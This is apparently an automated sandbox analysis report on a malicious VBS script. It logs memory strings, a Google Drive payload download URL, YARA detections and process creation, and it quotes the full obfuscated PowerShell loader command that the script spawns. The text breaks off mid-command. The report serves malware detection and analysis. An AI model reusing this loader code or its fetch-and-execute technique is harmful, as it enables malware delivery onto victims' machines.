Source: wscript.exe, 00000000.00000003.1400142535.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399158450.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397110745.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1401468590.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398700800.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399639000.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397554662.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398166574.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400548820.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400962270.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398485056.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398375334.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398592474.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397416560.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400990850.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400513979.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399106896.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397821425.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398997557.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400063078.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E578C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.g
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.go
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000009.00000002.2663304130.00000247E574F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3DEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E56F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Xw
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwI
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIR
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRr
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrE
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEg
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgt
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8e
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQU
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUi
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUie
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Q
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9k
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kk
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Q
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6a
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ai
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ais
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisxXRgl
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comh
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56536
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56535
            Source: unknownNetwork traffic detected: HTTP traffic on port 56535 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 443
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2

            System Summary

            Source: amsi32_3552.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4672
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4672
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE7C3299_2_00007FFB4AE7C329
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE7B5799_2_00007FFB4AE7B579
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500F1F013_2_0500F1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500FAC013_2_0500FAC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500EEA813_2_0500EEA8
            Source: 2669976595_366408723_KHI_SOF_240702_0957_P.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_3552.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal96.troj.expl.evad.winVBS@9/7@2/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Noncongestion.For
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf4slyuy.rhq.ps1
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1296
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3552
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling 